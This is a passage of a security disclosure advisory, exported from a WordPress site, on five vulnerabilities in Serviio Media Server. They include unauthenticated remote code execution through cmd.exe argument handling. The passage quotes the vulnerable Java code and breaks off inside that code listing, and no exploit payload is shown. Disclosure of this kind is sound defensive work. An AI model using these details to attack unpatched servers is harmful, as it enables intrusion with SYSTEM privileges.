{"id":7509,"date":"2017-05-02T14:19:28","date_gmt":"2017-05-02T22:19:28","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/02\/news-1294\/"},"modified":"2017-05-02T14:19:28","modified_gmt":"2017-05-02T22:19:28","slug":"news-1294","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/05\/02\/news-1294\/","title":{"rendered":"SSD Advisory \u2013 Serviio Media Server Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 02 May 2017 10:58:33 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3094\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3094');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a five (5) vulnerabilities found in Serviio Media Server. Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1.<\/p>\n<p>Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.<\/p>\n<p>Serviio works with many devices from your connected home (TV, Playstation 3, XBox 360, smart phones, tablets, etc.). It supports profiles for particular devices so that it can be tuned to maximise the device&#8217;s potential and\/or minimize lack of media format playback support (via transcoding).<\/p>\n<p>Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).<\/p>\n<p>The vulnerabilities found in Serviio Media Server are:<\/p>\n<ul>\n<li>Remote Code Execution<\/li>\n<li>Local Privilege Escalation<\/li>\n<li>Unauthenticated Password Modification<\/li>\n<li>Information Disclosure<\/li>\n<li>DOM-Based Cross-Site Scripting (XSS)<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> We have tried on numerous occasions over the past two months to contact the vendor, all emails sent to them went unanswered.<\/p>\n<p><span id=\"more-3094\"><\/span><\/p>\n<p><u><strong>Vulnerabilities Details<\/strong><\/u><\/p>\n<p><strong>Remote Code Execution<\/strong><br \/> Serviio Media Server is affected by an unauthenticated remote code execution vulnerability due to improper access control enforcement of the Configuration REST API and unsanitized input when <em>FFMPEGWrapper<\/em> calls <em>cmd.exe<\/em> to execute system commands. A remote attacker can exploit this with a simple <em>JSON<\/em> request, gaining system access with SYSTEM privileges via a specially crafted request and escape sequence.<\/p>\n<p><strong>Vulnerable Code<\/strong><br \/> Vulnerable file path: org\/serviio\/ui\/resources\/server\/ActionsServerResource.java<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e64b968109456\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">     private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {          this.validateParameters(representation, 2);          try {              MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));              String url = StringUtils.trim(representation.getParameters().get(1));              LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);              DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);              FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);              return this.responseOk();          }          catch (InvalidMediaFormatException e) {              return this.responseOk(603);          }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0052 seconds] -->  <\/p>\n<p>Vulnerable file path: serviio.jar \/ external \/ ProcessExecutor.java<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e656743756064\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">     private Map&lt;String, String&gt; createWindowsRuntimeEnvironmentVariables() {          HashMap&lt;String, String&gt; newEnv = new HashMap&lt;String, String&gt;();          newEnv.putAll(System.getenv());          ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];          i18n[0] = new ProcessExecutorParameter(&#8220;cmd&#8221;);          i18n[1] = new ProcessExecutorParameter(&#8220;\/C&#8221;);          for (int counter = 0; counter &lt; this.commandArguments.length; ++counter) {              ProcessExecutorParameter argument = this.commandArguments[counter];              String envName = &#8220;JENV_&#8221; + counter;              i18n[counter + 2] = new ProcessExecutorParameter(&#8220;%&#8221; + envName + &#8220;%&#8221;);              boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);              if (!quotesNeededForWindows) {                  argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));              }              newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));          }          this.commandArguments = i18n;          String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty(&#8220;java.io.tmpdir&#8221;));          newEnv.put(&#8220;HOMEDRIVE&#8221;, tempPath[0]);          newEnv.put(&#8220;HOMEPATH&#8221;, tempPath[1]);          newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());          if (log.isTraceEnabled()) {              log.trace(String.format(&#8220;Env variables: %s&#8221;, newEnv.toString()));          }          return newEnv;      }        private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {          return (quotesNeeded ? &#8220;&#8221;&#8221; : &#8220;&#8221;) + argument + (quotesNeeded ? &#8220;&#8221;&#8221; : &#8220;&#8221;);      }        protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {          boolean quotesNeeded = argument.getValue().indexOf(&#8221; &#8220;) &gt; -1;          return quotesNeeded;      }        private String escapeAmpersandForWindows(String value) {          return value.replaceAll(&#8220;&amp;&#8221;, &#8220;^&amp;&#8221;);      }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e656743756064-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e656743756064-39\">39<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-1\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Map<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">createWindowsRuntimeEnvironmentVariables<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">HashMap<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HashMap<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">putAll<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">System<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getenv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i18n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">commandArguments<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">i18n<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;cmd&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">i18n<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/C&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">commandArguments<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ProcessExecutorParameter <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">commandArguments<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">envName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;JENV_&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">i18n<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">counter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">envName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">boolean<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quotesNeededForWindows<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quotesNeededForWindows<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">quotesNeededForWindows<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProcessExecutorParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">escapeAmpersandForWindows<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">envName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">wrapInQuotes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quotesNeededForWindows<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">commandArguments<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i18n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tempPath<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FileUtils<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">splitFilePathToDriveAndRest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">System<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getProperty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;java.io.tmpdir&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;HOMEDRIVE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tempPath<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;HOMEPATH&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 